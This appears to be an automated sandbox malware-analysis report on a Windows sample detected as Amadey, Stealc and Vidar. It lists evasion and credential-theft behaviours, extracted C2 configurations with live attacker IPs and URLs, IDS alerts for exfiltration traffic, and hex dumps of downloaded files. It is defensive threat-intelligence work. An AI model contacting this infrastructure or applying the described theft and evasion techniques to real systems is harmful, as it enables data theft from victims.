Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1554142
MD5:	2878cc9a985c0fb2e09a37a43f3d99ae
SHA1:	41fe91f926c0f82e16454d9871c72776bfc5f104
SHA256:	67fadf8ac3d2ead9432d3872c87715b12dbe6974bf28a20622a9e75c555dfa61
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

Modifies windows update settings

Monitors registry run keys for changes

PE file contains section with special chars

Potentially malicious time measurement code found

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllE8	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/ViewSizePreferences.SourceAumid1	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllK8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpvh	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/ockedCacheCounterMutex	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe1395d7f	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/random.exe0	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.phpY	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/l	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php003	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpb	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/mine/random.exe78	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php/s	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpq	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpx	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedh	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpbh	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php7001	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exeW	Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.php.	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/urrentVersion	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpp#Xl	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/$	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpcoded;	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php.h	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000016.00000002.2646374094.0000000000161000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: file.exe.4276.0.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 51%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C656C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C656C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C7AA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A4440 PK11_PrivDecrypt,	0_2_6C7A4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C774420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C774420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A44C0 PK11_PubEncrypt,	0_2_6C7A44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C7F25B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C788670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C788670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C7AA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C78E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C7CA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C7D0180

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:54650 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49806 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a0969106aa.exe, 0000001C.00000003.2941381485.0000000004750000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001C.00000002.3075139523.0000000000D42000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001E.00000003.3098995666.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001E.00000002.3139269920.0000000000D42000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001F.00000003.3230672067.0000000005370000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001F.00000002.3270869703.0000000000D42000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:54752 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:54766
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54783 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54787 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:54786 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54793 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:54794 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:54801 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.5:54502 -> 162.159.36.2:53

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 